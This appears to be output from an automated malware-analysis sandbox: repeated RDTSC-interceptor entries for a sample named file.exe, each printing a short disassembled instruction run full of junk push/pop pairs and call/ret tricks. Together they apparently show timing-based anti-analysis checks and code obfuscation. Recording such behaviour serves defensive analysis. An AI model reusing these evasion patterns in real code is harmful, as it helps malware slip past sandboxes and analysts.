    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8748B3 second address: 8748D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F71347C49E9h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8748D8 second address: 8748DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8748DE second address: 8748E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8748E4 second address: 8748E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8765AA second address: 8765B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F71347C49D6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8765B4 second address: 8765C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jc 00007F713487FC76h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876FF5 second address: 87703B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F71347C49D8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov esi, ebx 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D1C95h], edx 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1F2Bh], esi 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876D93 second address: 876D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87703B second address: 877042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 876D99 second address: 876D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8778E1 second address: 8778E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87E9C3 second address: 87E9CD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F713487FC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880984 second address: 8809D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F71347C49E7h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, edx 0x0000000e push 00000000h 0x00000010 xor ebx, dword ptr [ebp+122D3C2Bh] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F71347C49D8h 0x00000020 pop ecx 0x00000021 mov dword ptr [esp+04h], ecx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc ecx 0x0000002e push ecx 0x0000002f ret 0x00000030 pop ecx 0x00000031 ret 0x00000032 xor edi, dword ptr [ebp+1248E71Ch] 0x00000038 cld 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push edx 0x0000003e pop edx 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882841 second address: 882847 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882847 second address: 88285B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F71347C49DEh 0x0000000c jbe 00007F71347C49D6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88285B second address: 88286B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F713487FC76h 0x0000000a jl 00007F713487FC76h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88286B second address: 88289F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F71347C49D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F71347C49FEh 0x00000012 jno 00007F71347C49EAh 0x00000018 push eax 0x00000019 push edx 0x0000001a jo 00007F71347C49D6h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882DA5 second address: 882E11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, edx 0x0000000c push 00000000h 0x0000000e jng 00007F713487FC7Ch 0x00000014 sub dword ptr [ebp+122D28DDh], edx 0x0000001a mov ebx, dword ptr [ebp+1246E625h] 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebx 0x00000025 call 00007F713487FC78h 0x0000002a pop ebx 0x0000002b mov dword ptr [esp+04h], ebx 0x0000002f add dword ptr [esp+04h], 00000014h 0x00000037 inc ebx 0x00000038 push ebx 0x00000039 ret 0x0000003a pop ebx 0x0000003b ret 0x0000003c jmp 00007F713487FC86h 0x00000041 push eax 0x00000042 push eax 0x00000043 push ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882F9A second address: 882FB4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883FF3 second address: 883FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882FB4 second address: 883016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F71347C49E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add edi, 31BEB150h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 js 00007F71347C49DEh 0x0000001d push edi 0x0000001e mov dword ptr [ebp+122D39EEh], esi 0x00000024 pop ebx 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov di, 573Dh 0x00000030 mov eax, dword ptr [ebp+122D02F5h] 0x00000036 mov edi, ebx 0x00000038 jc 00007F71347C49DCh 0x0000003e xor ebx, dword ptr [ebp+122D2AA7h] 0x00000044 push FFFFFFFFh 0x00000046 xor dword ptr [ebp+122D2C57h], edi 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884EE3 second address: 884F4C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F713487FC80h 0x0000000e nop 0x0000000f mov bx, dx 0x00000012 mov dword ptr [ebp+122D1FEBh], esi 0x00000018 push 00000000h 0x0000001a push ecx 0x0000001b call 00007F713487FC84h 0x00000020 jno 00007F713487FC76h 0x00000026 pop edi 0x00000027 pop ebx 0x00000028 push 00000000h 0x0000002a jp 00007F713487FC79h 0x00000030 movsx edi, di 0x00000033 jmp 00007F713487FC87h 0x00000038 xchg eax, esi 0x00000039 pushad 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883016 second address: 88301B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884F4C second address: 884F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F713487FC76h 0x0000000a popad 0x0000000b jnp 00007F713487FC7Ch 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007F713487FC8Dh 0x0000001b jmp 00007F713487FC87h 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88301B second address: 883021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885FF6 second address: 88607B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F713487FC82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F713487FC78h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 and bl, FFFFFF91h 0x00000029 or dword ptr [ebp+122D1FA9h], edx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F713487FC78h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b push 00000000h 0x0000004d mov edi, 783A8BD2h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F713487FC7Fh 0x0000005a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8861BE second address: 8861C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887243 second address: 8872DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F713487FC78h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov bl, C7h 0x00000023 mov ebx, dword ptr [ebp+122D2A54h] 0x00000029 push dword ptr fs:[00000000h] 0x00000030 add edi, 5DA368C6h 0x00000036 mov bh, DBh 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F713487FC78h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 00000016h 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 jmp 00007F713487FC89h 0x0000005e mov eax, dword ptr [ebp+122D0EEDh] 0x00000064 xor dword ptr [ebp+122D1C8Dh], ebx 0x0000006a push FFFFFFFFh 0x0000006c push eax 0x0000006d je 00007F713487FC84h 0x00000073 push eax 0x00000074 push edx 0x00000075 jo 00007F713487FC76h 0x0000007b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887EE1 second address: 887EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 886287 second address: 88628B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887EE6 second address: 887F50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007F71347C49E7h 0x00000011 pushad 0x00000012 jmp 00007F71347C49DDh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 popad 0x0000001a nop 0x0000001b xor dword ptr [ebp+122D238Bh], edx 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007F71347C49D8h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d push 00000000h 0x0000003f cmc 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push esi 0x00000044 jmp 00007F71347C49E4h 0x00000049 pop esi 0x0000004a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888F69 second address: 888FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007F713487FC78h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 push eax 0x00000024 jno 00007F713487FC7Ch 0x0000002a pop edi 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f mov ebx, dword ptr [ebp+122D3CDFh] 0x00000035 jmp 00007F713487FC83h 0x0000003a xchg eax, esi 0x0000003b push ecx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888FC0 second address: 888FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889187 second address: 8891A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnl 00007F713487FC80h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8880D4 second address: 8880D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B064 second address: 88B078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F713487FC7Ch 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BFBC second address: 88BFC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D030 second address: 88D034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88B078 second address: 88B08F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F71347C49E3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BFC2 second address: 88BFD1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88D034 second address: 88D042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F71347C49DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88819C second address: 8881AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F713487FC7Bh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88ECEF second address: 88ECF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88BFD1 second address: 88BFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88ECF3 second address: 88ED7F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F71347C49E3h 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1D1Eh], edx 0x00000013 pushad 0x00000014 sub dword ptr [ebp+122D33C5h], edi 0x0000001a popad 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F71347C49D8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 mov ebx, dword ptr [ebp+122D3BA7h] 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007F71347C49D8h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 jmp 00007F71347C49DCh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 push eax 0x00000063 pop eax 0x00000064 jl 00007F71347C49D6h 0x0000006a popad 0x0000006b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88ED7F second address: 88ED8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F713487FC7Ch 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88ED8F second address: 88ED93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890E03 second address: 890E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890E07 second address: 890E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8226FE second address: 82270E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F713487FC76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899C54 second address: 899C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 82FBE0 second address: 82FBE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8993CB second address: 8993DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F71347C49DBh 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8993DF second address: 8993FA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F713487FC85h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8993FA second address: 8993FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899542 second address: 899546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899546 second address: 89955E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F71347C49E2h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89955E second address: 899563 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899563 second address: 899569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8996F1 second address: 899703 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F713487FC78h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EB99 second address: 89EB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EB9D second address: 89EBE3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F713487FC76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop ebx 0x00000011 push ebx 0x00000012 jmp 00007F713487FC7Bh 0x00000017 pop ebx 0x00000018 popad 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jmp 00007F713487FC88h 0x00000022 mov eax, dword ptr [eax] 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jc 00007F713487FC76h 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4401 second address: 8A4418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F71347C49E3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4418 second address: 8A4422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F713487FC76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4422 second address: 8A4426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4426 second address: 8A4459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F713487FC89h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F713487FC76h 0x00000013 jmp 00007F713487FC7Ch 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A49B9 second address: 8A49C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jbe 00007F71347C49D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A49C8 second address: 8A49D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A49D0 second address: 8A49D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4B2F second address: 8A4B33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4B33 second address: 8A4B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4B39 second address: 8A4B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4B43 second address: 8A4B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4B47 second address: 8A4B4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A4C64 second address: 8A4C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5211 second address: 8A5216 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A53A2 second address: 8A53A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B7DE second address: 87B7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F713487FC84h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87BC4F second address: 87BC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
